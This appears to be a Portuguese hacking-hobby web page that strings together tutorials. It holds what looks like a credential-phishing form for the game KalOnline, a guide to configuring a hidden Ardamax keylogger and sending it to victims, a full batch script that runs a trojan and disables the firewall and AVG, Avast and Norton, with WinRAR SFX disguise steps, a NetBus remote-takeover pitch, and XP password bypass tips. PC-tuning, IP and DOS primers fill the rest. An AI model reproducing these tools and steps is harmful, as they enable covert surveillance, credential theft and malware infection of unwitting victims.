Envie-nos os seus comentários digite o nome do iten corretamente conforme o site www.kalonline.com no campo onde pede descrição do iten e dentro de 24 horas sua acount irá recebelo.
*Nota: este sistema eh php está conectado diretamente com o servidor do kalonline por uma hospedagem pirata, não use este processo com muita frequencia ou você pderá ser descoberto, e não espalhem para gringos pois a moral disto é tornar os BRs liders do server.
Se você deseja um G31 Bug digite /g31 + tipo (Bird, Tiger, Panther -Apenas um desses)no campo abaixo (lembrese que isso é apenas um bug e no update ele pode ser deletado desisntalando a 'ilusao de egg g31'

login
pawword
serer

Descrição dos intens que você deseja

MESSENGER DISCOVERY LIVE




Funções

Comando !imitate

digite !imitate 'texto' e aparecera como que se outro participante da conversa tivesse dito o 'texto'

Comando !error

digite !error 'texto' e aparece o 'texto' em forma de mensagem de aviso do windows

Comando Copy Avatar

copia a foto de exibição de seus contatos online

Alertas Discovery

avisa se alguém te bloquiou ou deletou da lista de contatos

entre outros comandos...


ARDAMAX KEYLOGGER

:::: Instalação ::::

1º Tela -> I Agree
2º Tela -> Next
3º Tela -> Install
4º Tela -> Desmarque a opção "View The Quick Tour" e clicke em Finish ..

Pronto .. Keylogger Instalado !! agora vamos as configurações ..

:::: Configurações ::::

Após a instalação aparecerá um icone na barra de tarefas que no caso é o nosso ardamax que acabamos de instalar ..


Agora vamos Registra-lo .. click no ícone do ardamax com o direito do mouse e vá até em "Enter Registration Key" e digite o serial que eu coloquei na pasta



agora de um Ok e pronto,keylogger resgistrado !!


Agora Vamos até o nosso icone do keylogger na barra de tarefas e clickar com o direito do mouse e ir até em Options,vamos configura-lo ...

Vamos clickar na opção "Invisibility" do lado esquerdo da tela ..
vamos definir como o keylogger ficará oculto no nosso sistema,aconselho selecionarem todas as opções como mostra a imagem abaixo:


Depois de configurar do seu jeito ou do meu ( hehe ) vamos até a opção "Security" do lado esquerdo da tela, clique em ENABLE e vamos adicionar uma senha,claro que eu aconselho adicionar,pois caso alguem da sua casa ai desconfiar do arquivo e tentar abrir vai pedir a senha.. Bom,adicione a senha de um OK e pronto !!


Depois de ter feito tudo isto ai,vamos até a opção “Options” que fica do lado esquerdo da tela e vamos selecionar a opção "START IN HIDDEN MODE" selecionando esta opção,quando o Windows iniciar o ícone do keylogger vai estar oculto na barra de tarefas.
Deixe a opção "Run on Windows Startup" marcada !!


Bom,nosso keylogger agora ja esta configurado.. para visualizar os nossos logs vamos até a opção "Log" do lado esquerdo da tela e logo após em "Viel Log" .. ou se não é só clickar 2 vezes no icone do keylogger que fica na barra de tarefas,no caso se nao estiver aparecendo o icone na barra de tarefas,digite a tecla de atalho que eh CTRL+ALT+SHIFT+H e ai soh digitar a senha que vc colocou e pronto !!

Agora vamos Criar nosso server no qual mandaremos para a vitima executar .. Muahuauauha

:::: Criando um Server ::::

Vamos até o nosso ícone do kl que fica na barra de tarefas,clicar com o direito nele e ir até na opção "Remote Installation" e vamos começar



Agora vamos as opções:

1º Tela -> Avançar

2º Tela -> nesta tela temos um joiner que vai servir para camuflar nosso kl com algum programinha, ou foto. Caso queira juntar marque a opção "append keylogger..." e clicke em browse e escolhe o arquivo que vc quer juntar e de ok e em seguida avançar ...

3º Tela -> marque todas as opções como mostra a figura e logo após clicar em avançar


4º Tela -> coloque uma senha e logo após clicke em avançar

5º Tela -> Avançar

6º Tela -> marque a opção "start in hidden mode" e logo após avançar

7º Tela -> Nesta opção vamos definir se os logs que vamos receber deste server sera para email ou ftp,no caso vou ensinar para o email ...
Vamos marcar a "opção Send Logs Every" e coloquem ao lado de quanto em quanto tempo vcs querem receber os logs ... no caso coloquei a cada 30 minutos ..
em "delivery method" colocaremos "via email"
agora na opção Include vamos colocar oq queremos receber,no caso temos a opção de Web Sites,Logs de chat e a keystores que é td que foi digitado ... eu coloquei apenas Keystores !!
agora na opção abaixo "Log Format" deixe a opção "HTML Page" com esta opção podemos ver os logs no proprio email msm sem precisar do "log view"
Logo após desmarque a opção "Send Only If Log .. " veja como ficou a imagem :


8º Tela -> aki vamos digitar o email para qual vamos receber os logs, na imagem abaixo estou usando um email@yahoo.com.br e aconselho tds vcs a usarem o do Yahoo, Gmail ou Itelefonica. Após colocar o e-mail nos lugares certos, como mostra a figura abaixo, clique em “FIND”, para que o programa possa preencher o SAMT Host do e-mail



Agora clicke em "Test" e se aparecer a msg de sucesso de um ok !! (se não aparecer a mensagem de sucesso e der um erro, basta clicar em “OK” e “TEST” de novo, até que de certo ^^


9º Tela -> vamos clickar em "Change Icon",escolher um icone para o nosso keylogger e pronto,de avançar,logo após Conluir ...


Pronto,abrirá a pasta aonde o nosso server foi criado,no caso o meu é o que esta com o nome de Install =D


Pronto,o server foi criado com sucesso e agora é só mandar para a vitima !!

::The End::









DIMINUA SEU LAG E MELHORE SEU PC

Aprenda a fazer seu computador a ficar um cadinho de nada mais rápido xD



O WinXP, por padrão, mantém ativos uma série de serviços que são desnecessários para a maioria dos usuários. Para desativá-los/configurá-los, vá em Painel de Controle > Ferramentas Administrativas > Serviços. É preciso, no entanto, saber o que se está fazendo, já que desabilitar serviços realmente necessários para o sistema fará com que seu Windows possa ficar mais lento ou que algumas coisas deixem de funcionar (como Internet, por exemplo).



Uma dica é colocar todos os serviços para manual e reiniciar o micro. Depois é só conferir os serviços iniciados e configurá-los para automático. Pode acontecer de que serviços necessários não sejam iniciados. Melhor é saber o que faz cada um destes serviços. Veja abaixo alguns deles, os outros, cuja funcionabilidade não é muito clara é melhor deixar em automático.

Para desabilitar os serviços, de 2 cliques e aperte na opçao parar depois selecione desativar (desativado),os serviçoes que ficaram no manual voçê podera parar ele tambem para que ele abilite apenas quando seja requerido sua funçao.


Podem ficar DESABILITADOS:


- Ajuda do cartão inteligente (Ajuda para dispositivos Smart Cards)


- Atualizações automáticas (faz o download automaticamente de atualizações do Windows)

- Cartão inteligente (ativa dispositivos de Smart Card)

- Compartilhamento remoto da área de trabalho do NetMeeting

- Configuração zero sem fio (necessário para dispositivos 802.11)

- Gerenciador de conexão de acesso remoto automático

- Gerenciador de sessão de ajuda de área de trabalho remota

- Horário do Windows (Mantém data e hora em sincronia com servidores de rede)

- IMAPI CD-Burning COM Service (Ativa o recurso de gravação de CDs embutido do Windows XP) – Se vc grava CDs usando apenas os recursos do Windows XP, deixe em Manual (padrão)

- Número de série de mídia portátil


- Mensageiro (Serviço de mensagens entre computadores da rede. NÃO É o Windows Messenger)

- Registro Remoto (por questão de segurança – permite que usuários remotos alterem o Registro do seu Windows)

- Sistema de alimentação ininterrupta (Gerencia No-Breaks) (Se você usa um no-break, deixe em Automático)

- Telnet (por questão de segurança)

- Temas

Já devem estar Desabilitados

- Acesso a dispositivo de interface humana (usado para dispositivos especiais de entrada)

- Roteamento e acesso remoto



Podem ficar em MANUAL:


- Agendador de tarefas (Agenda tarefas para serem executadas em data e hora pré-determinadas)

- Ajuda e suporte (Ativa assistentes e ajuda avançada)

- Carregar Gerenciador (gerencia transferências de arquivos entre computadores da rede.)

- Erro ao informar o serviço (Informa erros de serviços e aplicativos de terceiros)

- Gerenciador de conexão de acesso remoto

- Número de série de mídia portátil

- Servidor



Já devem estar em Manual:

- Adaptador de desempenho WMI

- Aplicativo de sistema COM+

- Área de armazenamento (Compartilha informações com computadores remotos)

- Armazenamento removível (Dispositivos de armazenamento removíveis, como Zip Drives)

- Assistente de aquisição de imagens do Windows (WIA)

- Conexões de rede (gerencia conexões de rede)

- Coordenador de transações distribuídas (Coordena gerenciadores de recursos)

- Cópia de volume em memória

- DDE de rede (Habilita o Dynamic Data Storage)

- DSDM de DDE de rede (Gerencia compartilhamentos de rede DDE)

- Extensões de driver de instrum. gerenc. do Windows (Gerenciamento de drivers)

- Firewall de conexão com a Internet (FCI) / Compartilhamento de conexão com a Internet (CCI)

- Fornecedor de suporte de segurança NT LM

- Gerenciamento de aplicativo

- Host de dispositivo Plug and Play universal

- Logon de rede

- Logs e alertas de desempenho

- MS Software Shadow Copy Provider

- QoS RSVP (Habilita services compatíveis com o QoS)

- Reconhecimento de local da rede (NLA)

- Serviço administrativo do gerenciador de disco lógico

- Serviço de descoberta SSDP

- Serviço de indexação

- Serviço de transferência inteligente de plano de fundo

- Serviço 'Gateway de camada de aplicativo'

- Serviços de terminal

- Telefonia

- Windows Installer




Programas na inicialização


Alguns programas são iniciados junto com o sistema, porem raramente são necessários a todo minuto. Estes podem ser retirados da inicialização da seguinte maneira: Clique em Iniciar >> Executar, digite MSCONFIG e clique OK. Na aba Iniciar, desabilite os programas que não quer que iniciem junto com o Windows.



Libere 20% de sua banda de rede/Internet.
PS: essa e boa xDD


Um recurso do XP chamado Agendador de pacotes OoS reserva 20% da banda disponível de rede e internet para uso próprio. Desabilite-o da seguinte maneira:

( é necessário estar logado como administrador)

Clique em Iniciar > Executar, digite GPEDIT.MSC e pressione OK.

Em Configuração do computador > Modelos Administrativos > Rede. Selecione, na janela esquerda, “Agendador de pacotes QoS”. Na janela da direita, dê duplo-clique na em “Limite de reserva de banda”. Na aba Configuração, selecione Ativado. Na linha “Limitar % da banda”, digite 0 (zero). Clique em Aplicar, OK. Vá nas configurações da rede (Painel de Controle > Conexões de Rede), clique com o botão direito na conexão existente, selecione Propriedades. Na aba Geral, habilite o Agendador de Pacotes QoS (se já estiver habilitado, deixe como está). Reinicie o computador.




Desabilite Serviços de rede
A menos que você realmente o use, o Telnet abre as portas para uma invasão. Para desabilitá-lo, vá em Painel de Controle > Ferramentas Administrativas > Serviços. Altere o serviço Telnet de “manual” para “desabilitado”. Desative também os serviços “Compartilhamento remoto da área de trabalho do NetMeeting” e “Registro Remoto”.



Desabilite a Notificação de Erros à Microsoft.

Toda vez que ocorre um erro ou travamento, o Windows lhe recomendará enviar informações à Microsoft. Para evitar isto, vá nas propriedades de Sistema (Painel de Controle > Sistema), em Avançado > Notificação de Erros, e selecione “Desabilitar a Notificação de Erros”.




Windows Messenger
Para impedir que este serviço inicie com o sistema, faça o seguinte

Clique em Iniciar > Executar > msconfig

Na aba Iniciar, desabilite o serviço “msmsgs” (Windows Messenger).

No entanto, inexplicavelmente em alguns casos ele volta. Então, apelamos para o método seguinte:

Na pasta Arquivos de Programas > Messenger e renomeie o arquivo msmsgs.exe para outro nome qualquer (msmsgsbobo.old, por exemplo).

Você também pode:

Clicar em Iniciar > Executar > gpedit.msc

Na janela que abrirá, vá em Configuração do Computador > Modelos Administrativos > Componentes do Windows > Windows Messenger. Clique duas vezes na opção “Não permitir que o Windows Messenger inicie automaticamente”, e selecione “Ativado”.Se preferir, pode desativar de vez o Windows Messenger, alterando a opção “Não permitir que o Windows Messenger seja executado” para “Ativado”. Isto impedirá a utilização do WM por qualquer usuário do micro.

TROJAN INDETECTÁVEL



Tutorial – Trojan indetectável (Duas das formas)

Com este tutorial você irá aprender a deixar um trojan indetectável com o Winrar,

fazendo um bom uso das configurações SFX que o programa disponibiliza.

Vai da criatividade de cada um a forma de executar os comandos contidos no nosso

“pacote de objetos maliciosos”, vou mostrar uma forma bem básica de executar um

trojan e desabilitar as defesas do Firewall sem que a vítima note!

Pra isso será necessário:

Winrar:

~> http://baixaki.ig.com.br/download/WinRAR.htm

Um jogo qualquer (pode ser qualquer outro arquivo de sua preferência) que pode ser

encontrado aqui:

~> http://www.baixaki.com

Bloco de notas:

~> Iniciar / Programas / Acessórios

Um Servidor de algum programa de monitoração remota (netbus, prorat, turkojan,

enfim qualquer trojan), que chamarei de server.exe.

Siga as seguintes etapas:

1°) Se for usar o mesmo jogo que mencionei, descompacte-o em uma pasta qualquer

(vamos dizer C:\).

2°) Digite (ou copie e cole) os seguintes comandos no bloco de notas:

@echo off
Start server.exe
break off
cd\
net stop wscsvc >nul
sc config wscsvc start= disabled
cls
netsh firewall set opmode mode=disable >nul
net stop SharedAccess >nul
goto avg
:avg
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgcc.exe >nul
taskkill /f /im avgamsvr.exe >nul
taskkill /f /im avgupsvc.exe >nul
taskkill /f /im avgw.exe >nul
taskkill /f /im avgcc32.exe >nul
taskkill /f /im avgctrl.exe >nul
taskkill /f /im avgserv.exe >nul
taskkill /f /im avgserv9.exe >nul
taskkill /f /im avgserv9schedapp.exe >nul
taskkill /f /im avgw.exe >nul
goto avast
:avast
taskkill /f /im ashwebsv.exe >nul
taskkill /f /im ashdisp.exe >nul
taskkill /f /im ashmaisv.exe >nul
taskkill /f /im ashserv.exe >nul
taskkill /f /im ashwebsv.exe >nul
goto norton
:norton
taskkill /f /im norton.exe >nul
taskkill /f /im Norton Auto-Protect.exe >nul
taskkill /f /im norton_av.exe >nul
taskkill /f /im nortonav.exe >nul
msg * End of instalation!
exit
:
3°) Salve na extensão .bat (comando do MS-DOS) – Com estes comandos,

desabilitaremos o Firewall da vítima (se for do Windows) e também o antivírus (se for:

AVG, Norton ou Avast), que aqui neste caso irei chamar de Arquivo.bat.

4°)Agora deixe na mesma pasta todos os arquivos que nos interessa: Todos os do

jogo, o Server.exe e o arquivo.exe.

5°)Selecione todos os arquivos e clique com o botão direito do mouse e vá em

“Adicionar para o arquivo” (opção com o Winrar instalado).

6°)Na primeira aba “Geral” escolha o caminho para a criação do arquivo e em “Opções

de compressão” marque a opção “Criar arquivo SFX”; Na aba “Avançado” clique em

“Opções SFX” e deverá abrir outra janela, onde você irá escolher o caminho para a

extração no PC da vítima (ela pode mudar depois se quiser), vamos usar como

exemplo C:\ e em “Configuração do Programa” preencha o campo “Executar após a

extração” com o nome do arquivo de comando do DOS, neste caso: arquivo.bat. Clique

em OK e em OK novamente.

7°) O arquivo deverá ser criado na pasta que você escolheu!

8°) De preferência, troque o ícone por um relativo ao jogo e mande pra quem você

quer observar, deste modo pode ser feito com badcom´s, faça o mesmo procedimento

e vocêpoderá ferrar com o PC de alguém!

OBS:

~> Esta é uma das maneiras que se tem do AV não detectar o trojan (como visto, não

serve pra qualquer AV).

~> Na escolha do arquivo de disfarce, de preferência escolha um que ocupe toda a

tela do PC, pois quando se der a instalação irá se abrir a janela do prompt de

comando do DOS e se a vítima perceber os processos se finalizando poderá por em

risco a eficácia do plano.

~> Não escolha um arquivo muito pesado, já que ele será apenas o disfarce do trojan.

~> Sabendo um pouco de comandos do DOS em arquivos .bat, use da criatividade pra

deixar mais eficaz o arquivo de instalação do Winrar.

~> Aproveite os outros tópicos para criar um trojan e este para colocá-lo em ação!
Mais um jeito fácil ai com WINRAR

1° clica com o botão direito sobre o executável (o vírus) e clica em adicionar para o arquivo

2º Irá abrir uma janela, mude de .rar para .exe.

3º Clique na aba Avançado e depois em Opções SFX..., Põem o nome do arquivo que será executado, no caso o nome do vírus que você esta camuflando.

4º Clique na aba Métodos e marque as Opções Ocultar Tudo e Ignorar arquivos existentes.

5º Clique na aba Texto e Ícone e clique em Procurar...

6º Use um ícone que sua vitima não possa desconfiar no tutorial eu usei de uma imagem..

INVASÃO REMOTA



Quer invadir se divertir as custas de seus amigos? Melhor doque um KeyLogger, com o NetBus você pode tomar o controle sobre o computador de seu amigo nun estado ivoluntário de acesso remoto.
*Este programa é um tipo de Trojan, para poder ultilizar desabilite seu anti-vírus(não haverá danos em seu computador).


Formato: EXE

Tamanho: 5.5 KB

Hospedagem: Desconhecida




(novo link direcionando pa pagina com download...o antigo kebro)

ENTRANDO NA SENHA DO XP




Seu pai bloqueou a senha do seu usuário no computador? então leia este tutorial e aprenda a desbloquear!

INVADINDO O XP

Para entrar em seu usuario sem saber a senha use este método caso o ADM não tenha senha:
Quando o pc for fazer BOOT pelo HD, antes de entrar naquela tela de "carregando" do WinXP, aperte o botão F8 do teclado, e escolha a opção "Entrar em modo de segurança".
Logue como administrador e vá em "Menu Iniciar", "Painel de Controle", "Contas de Usuário" e clique no nome de usuário, depois clique em "Remover Senha".

Se o adiministrador tiver senha use este programa de recuperação de senha para descobrir:

Windows Password Recovery Bootdisk Creator

Como funciona?

O programa recupera instantaneamente as senhas dos usuários através de buscas nas hashes do sistema operacional. Assim, não há desespero se você não conseguir entrar no computador. Para reverter a situação, é necessário criar um disco inicializável para usá-lo ao reiniciar o PC.

Depois de instalar o software, execute-o e clique em Next (Avançar), o programa perguntará o destino de instalação, selecione o seu dispositivo móvel (pendrive, disquete, CD etc.). Agora, se você esquecer a senha do PC, basta colocá-lo no computador e reiniciar o sistema operacional.

Então, entre no programa pelo boot do sistema (semelhante ao DOS). Pronto! Windows Password Recovery Bootdisk Creator vai acessar o seu Windows e recuperar a senha do login desejado.

ALIEN GUISE


Aprenda aqui como customizar o seu computador.
Existe vários tipos de programas onde voçê pode customizar.


AlienGUIse

Nele voçê customiza seu PC de vários modelos diferente.


Formato: Aplicativo

Tamanho:: 37,7 MB

Hospedagem: RapidShare

DESCUBRA O SIGINIFICADO DE IP



Antes de sair invadindo computadores por ip, descubra quais seus verdadeiros significados e funções.

Introdução
O uso de computadores em rede e, claro, a internet, requer que cada máquina tenha um identificador que a diferencie das demais. Para isso, é necessário, entre outras coisas, que cada computador tenha um endereço, alguma forma de ser encontrado. É necesse ponto que entra em cena o endereço IP, cujo conceito básico é explicado nas próximas linhas.
Endereço IP
Se você usa a internet ou trabalha em um escritório onde todos os computadores são interligados, já deve ter ouvido falar de endereço IP (Internet Protocol). Trata-se de uma especificação que permite a comunicação consistente entre computadores, mesmo que estes sejam de plataformas diferentes ou estejam distantes.
A comunicação entre computadores é feita através do uso de padrões, isto é, uma espécie de "idioma" que permite que todas as máquinas se entendam. Em outras palavras, é necessário fazer uso de um protocolo que indique como os computadores devem se comunicar. No caso do IP, o protocolo aplicado é o TCP/IP (Transmission Control Protocol/Internet Protocol). Existem outros, mas o TCP/IP é o mais conhecido, além de ser o protocolo básico usado na internet.
O uso do protocolo TCP/IP não é completo se um endereço IP não for utilizado. Se, por exemplo, dados são enviados de um computador para outro, o primeiro precisa saber o endereço IP do destinatário e este precisa saber o IP do emissor, caso a comunicação exija uma resposta. Sem o endereço IP, os computadores não conseguem ser localizados em uma rede, e isso se aplica à própria internet, já que ela funciona como uma "grande rede".
Analisando o endereço IP
O endereço IP (ou somente IP) é uma seqüência de números composta de 32 bits. Esse valor consiste em um conjunto de quatro grupos de 8 bits. Cada conjunto é separado por um ponto e recebe o nome de octeto ou simplesmente byte, já que um byte é formado por 8 bits. O número 172.31.110.10 é um exemplo. Repare que cada octeto é formado por, no máximo, 3 caracteres, sendo que cada um pode ir de 0 a 255.
Os dois primeiros octetos de um endereço IP geralmente são usados para identificar a rede, mas isso não é regra fixa, como será visto mais adiante. Em lugares com várias redes, pode-se ter, por exemplo, 172.31 para uma rede e 172.32 para outra. Quanto aos últimos dois octetos, eles são usados na identificação de computadores dentro da rede. Por exemplo, em uma rede com 400 PCs, pode-se usar as faixas de 172.31.100.1 a 172.31.100.255 e 172.31.101.0 a 172.31.101.255. Novamente, esta não é uma regra fixa.
Como os endereços IP usados em redes locais são semelhantes aos IPs da internet, usa-se um padrão conhecido como IANA (Internet Assigned Numbers Authority) para a distribuição de endereços nestas redes. Assim, determinadas faixas de IP são usadas para redes locais, enquanto que outras são usadas na internet. Como uma rede local em um prédio não se comunica a uma rede local em outro lugar (a não ser que ambas sejam interconectadas) não há problemas de um mesmo endereço IP ser utilizado nas duas redes. Já na internet, isso não pode acontecer. Nela, cada computador precisa de um IP exclusivo.
O padrão IANA divide a utilização de IPs para redes em, basicamente, 3 classes principais e duas que podem ser consideradas secundárias. Esse divisão foi feita de forma a evitar ao máximo o desperdício de endereços IPs que podem ser utilizados em uma rede:
Classe A: 1.0.0.0 até 126.0.0.0 - Permite até 16.777.216 de computadores em cada rede (máximo de 126 redes);
Classe B: 128.0.0.0 até 191.255.0.0 - Permite até 65.536 computadores em uma rede (máximo de 16.384 redes);
Classe C: 192.0.0.0 até 223.255.255.254 - Permite até 256 computadores em uma rede (máximo de 2.097.150 redes);
Classe D: 224.0.0.0 até 239.255.255.255 - multicast
Classe E: 240.0.0.0 até 255.255.255.255 multicast reservado
As três primeiras classes são assim divididas para atender as seguintes necessidades:
- os endereços IP da classe A são usados em locais onde é necessário poucas redes, mas uma grande quantidade de máquinas nelas. Para isso, o primeiro byte é usado como identificador da rede e os demais servem como identificador dos computadores;
- os endereços IP da classe B são usados nos casos onde a quantidade de redes é equivalente ou semelhante à quantidade de computadores. Para isso, usa-se os dois primeiros bytes do endereço IP para identificar a rede e os restantes para identificar os computadores;
- os endereços IP da classe C são usados em locais que requerem grande quantidade de redes, mas com poucas máquinas em cada uma. Assim, os três primeiros bytes são usados para identificar a rede e o último é utilizado para identificar as máquinas.
Quanto às classes D e E, elas existem por motivos especiais: a primeira é usada para a propagação de pacotes especiais para a comunicação entre os computadores, enquanto que a segunda está reservada para aplicações futuras ou experimentais.
Vale frisar que há vários outros blocos de endereços reservados para fins especiais. Por exemplo, o endereço 127.0.0.1 sempre se refere à própria máquina, isto é, ao próprio host, razão esta que o leva a ser chamado de localhost.
Máscara de sub-rede
Para identificar a classe IP que está sendo utilizada em uma rede ou para se especificar uma dada configuração de rede, usa-se um conceito conhecido como máscara de sub-rede. Se, por exemplo, um byte é usado para identificação da rede, tal byte na máscara de sub-rede será 255. Mas, se um byte é usado para identificação de um computador e não de uma rede, seu valor na máscara de sub-rede é 0 (zero). A tabela a seguir mostra um exemplo dessa relação. É importante frisar, no entanto, que o conceito de máscara de sub-rede é mais complexo (aqui é mostrado apenas a utilização mais comum), de forma que os números que a envolvem podem ser diferentes de 255 e de 0, já que a quantidade de classes é maior.



IP estático e IP dinâmico
IP estático (ou fixo) é um número IP dado permanentemente a um computador, ou seja, seu IP não muda, exceto se tal ação for feita manualmente. Como exemplo, há casos de assinaturas de acesso à internet via ADSL, onde alguns provedores atribuem um IP estático aos seus assinantes. Assim, sempre que um cliente se conectar, usará o mesmo IP. Essa prática é cada vez mais rara entre os provedores de acesso, por uma série de fatores, que inclui problemas de segurança.
O IP dinâmico, por sua vez, é um número que é dado a um computador quando este se conecta à rede, mas que muda toda vez que há conexão. Por exemplo, suponha que você conectou seu computador à internet hoje. Quando você conectá-lo amanhã, lhe será dado outro IP. Para entender melhor, imagine a seguinte situação: uma empresa tem 80 computadores ligados em rede. Usando IPs dinâmicos, a empresa disponibilizou 90 endereços IP para tais máquinas. Como nenhum IP é fixo, quando um computador "entra" na rede, lhe é atribuído um IP destes 90 que não esteja sendo usado por nenhum outro computador. É mais ou menos assim que os provedores de internet trabalham. Toda vez que você se conecta à internet, seu provedor dá ao seu computador um IP dela que esteja livre.
O método mais usado para a distribuição de IPs dinâmicos é a protocolo DHCP (Dynamic Host Configuration Protocol).
Domínio
Todos os sites da internet também possuem IP. Neste caso, é usado IP estático. Mas você pode estar se perguntando: como isso ocorre, se eu digito www.nomedosite.com.br em vez de um endereço IP? Através do domínio, que consiste numa forma mais fácil de acessar sites do que pelo seu IP. Esse recurso é como um "nome" dado ao IP. Sendo assim, quando você digita em seu navegador "www.nomedosite.com.br", um servidor na internet do seu provedor chamado DNS (Domain Name System - Sistema de Nomes de Domínios), descobre qual o IP está relacionado ao site que você digitou e direciona seu computador a ele. O sistema DNS possui uma hierarquia interessante, semelhante a uma árvore (termo conhecido por programadores). Se, por exemplo, o site www.infowester.com é requisitado, o sistema envia a solicitação a um servidor responsável por terminações ".com". Esse servidor vai localizar qual o IP do endereço e responder à solicitação. Se o site solicitado termina com ".br", um servidor responsável por essa terminação é consultado. Assim, fica mais ágil a tarefa de localização de sites e dessa forma, sua máquina consegue acessar praticamente qualquer site da internet.
IPv4 e IPv6
O esquema de IPs visto neste artigo é conhecido como IPv4. Como dito antes, consiste num sistema de 32 bits, cujos endereços IP são divididos em quatro octetos (ou bytes) separados por pontos. Fazendo um cálculo, descobre-se que há disponível 4.294.967.296 de possibilidades para endereços IP. Esse número, apesar de grande, tende a ser cada vez mais limitado, uma vez que o uso de endereços IP aumenta constantemente. Por causa disso, uma nova versão do IP foi desenvolvida e está sendo aprimorada: o IPv6. Esse padrão promete expandir bastante o número de IPs disponíveis, já que usa 128 bits. O IPv6 já é suportado pela maioria dos sistemas operacionais recentes, como o Windows Vista, o Mac OS X e as distribuições atuais do Linux.
Finalizando
Este artigo fez uma abordagem básica sobre endereços IPs. O assunto, na verdade, é mais complexo e os detalhes certamente são interessantes aos profissionais que trabalham na área ou a quem deseja se especializar no ramo. Assim, caso queira ter conhecimentos aprofundados sobre IPs e, conseqüentemente, sobre tudo o que envolve redes, estude o protocolo TCP/IP e Modelo OSI. É a melhor maneira de se começar.

GUIA BÁSICO DE MS-DOS



Aprenda a fazer coisas úteis no dos, tanto para arrumar seu computador, quanto para destruir o de seus "amigos"


Introdução
DOS (Disk Operating System) é um "sistema operacional" desenvolvido para permitir ao usuário realizar todas as funções básicas e essenciais no computador. Poucos foram os DOS produzidos até hoje: MS-DOS, da Microsoft, o PC-DOS, da IBM, DR-DOS, da Digital Research, o NOVELL, para redes, etc. O MS-DOS dominou amplamente o mercado em sua época e, até hoje, faz faz parte do Software Básico (programa indispensável ao funcionamento do computador). Ele, até certo ponto, atua como uma interface básica do hardware do computador, por isso é tão especial. São raros os programas executados no Windows que possuem ajuda do DOS. Isso deixa claro que ele é mais usado para gerenciar e resolver problemas de sistema. O DOS é uma forma de você comunicar suas instruções ao computador. E tais instruções devem ser as que ele reconhece. Estas instruções, na maior parte, consistem em palavras baseadas na língua inglesa.
PROMPT
As funções do DOS são padronizadas e independentes do hardware de cada computador. Por outro lado, cada PC tem funções básicas elementares peculiares ao seu projeto eletrônico. Por isso, precisa ter um programa que decompõem as funções padrões do DOS nas suas funções elementares. Chamado de BIOS ( em inglês Binary Input Output System ), esse programa é gravado em memória permanente na placa-mãe do PC e tem a função de dar partida na operação BOOT, ativando o DOS e atuar durante toda a operação, fazendo a ligação entre o DOS e o hardware.
Antes de irmos aos comandos, veremos primeiro o que é PROMPT:
PROMPT é o chamado sinal de prontidão, pois indica que o computador está pronto para receber instruções. Ele mostra também sua localização, ou seja, em que drive (unidade de armazenamento) e diretório você está trabalhando. Veja o exemplo:
C:\DOS>_
O exemplo indica que você está no drive C:\, na pasta DOS. Ao lado do sinal >, há um "tracinho" piscando, chamado CURSOR. Ele indica aonde vai aparecer os carecteres que você digitar.
COMO ACESSAR O DOS
Para acessar o DOS existe, basicamente, 3 formas. Se você estiver no Windows 98, basta clicar em Iniciar/Desligar e escolher "Reiniciar o computador em modo MS-DOS". Outra forma no Windows é, clicar em Iniciar/Programas e selecionar "Prompt do MS-DOS". Mas está última acessará o DOS com o Windows ainda carregado, o que significa que alguns comandos podem não funcionar. Se estiver com o computador desligado e quiser ir direto para o DOS, sem passar pelo Windows, fique clicando em F8 até um lista aparecer. Escolha "Somente Prompt de Comando", que normalmente é o penúltimo item.
Vale lembrar que, se você usa o Windows Millenium ou superior, o acesso ao DOS não é tão simples, visto que este sistema operacional é menos dependente do DOS do que o Windows98 ou 95. Se você quiser usar o DOS no WinMe, terá que reiniciar o computador com o disquete de boot, criado no próprio WinMe.
Outra coisa que vale lembrar é que você pode não ter o DOS completo se usa o Win98 ou 95. Isso porque o DOS completo era para ser usado sozinho, como um sistema operacional único. Com o Windows, alguns comandos foram retirados e deixado somente os essenciais. Mas você pode copiar os outros comandos para o seu computador, se tiver uma cópia do DOS completa.
EXECUTANDO OS COMANDOS
Antes de começarmos a ver os comandos, é necessário saber como executá-los. No prompt, você verá o cursor piscando. Isso significa que você já pode digitar. Depois de ter escolhido o comando, tecle Enter. Aqui, para exemplificar usaremos o modelo de prompt "C:\Windows>", mas vale lembrar que "C" pode ser qualquer unidade de disco no seu computador. Normalmente a letra A indica a unidade de disquete. E "Windows" pode significar qualquer pasta dentro da unidade que você está trabalhando. Mas, é importante saber que o DOS geralmente não visualiza nomes de arquivos com mais de 8 caracteres. Por isso, a pasta Meus Documentos, por exemplo, fica assim: MEUSDO~1.
COMANDOS:
DATE
Comando que atualiza a data do sistema operacional:
DD - DIA Dígito entre 1 - 31
MM - MÊS Dígito entre 1 - 12
AA - ANO Dígito entre 80 - 99
Separadores: Hífen ( - ), Barra ( / ) ou Ponto ( . )
Exemplo:
C:\>DATE
O Sistema apresentará a seguinte tela:

Em seguida, digita-se a data atual e pressiona-se Enter.
TIME
Comando que atualiza a hora do sistema operacional:
hh - Horas - Dígito entre 0 - 24
mm - Minuto - Dígito entre 0 - 59
ss - Segundo - Dígito entre 0 - 59
Separadores: Dígito Pontos ( : ) ou Ponto ( . ).
Exemplo:
C:\>Time
O Sistema apresentará a seguinte tela:


Em seguida, digita-se a hora atual e tecla-se Enter.
VER
Comando que mostra a versão do sistema operacional:
C:\>VER
DIR
Comando que mostra a lista de arquivos de um diretório (pasta). Este comando pode conter algumas variações para obter-se uma resposta diferente:
* /P Lista o diretório com pausa, usado quando a pasta encontra-se com v�rios arquivos.
* /W Lista o diretório na horizontal.
* / ? Lista todas as opções do comando DIR.
O comando dir apresenta, ainda, três informações bastante importantes ao seu final: o número de arquivos contidos no diretório corrente, o espaço em disco ocupado por este(s) arquivo(s) e o espa�o disponível no disco.
Exemplo:
C:\>DIR / W


C:\>DIR /P
C:\>DIR / W
CLS
Comando que limpa a tela e deixa o cursor no canto superior esquerdo:
Exemplo:
C:\>CLS
MKDIR ou MD
Comando que cria um diretório a partir da pasta corrente com o nome especificado:
Sintaxe: MD [caminho] { Nome } ou MKDIR [caminho] { Nome }
Exemplo:
C:\>MD PROFESSOR
C:\>MKDIR PROFESSOR\ALUNOS
CHDIR ou CD
Comando que muda um subdiretório corrente a partir do diretório atual:
Sintaxe: CD [caminho] ou CHDIR [caminho]
Exemplo:
C:\>CD PROFESSOR - entra no diretório PROFESSOR
C:\>CD PROFESSOR\ALUNOS - alterna para o subdiretório ALUNOS do diretório PROFESSOR
C:\>CD - indica o caminho (PATH) atual.
RMDIR ou RD
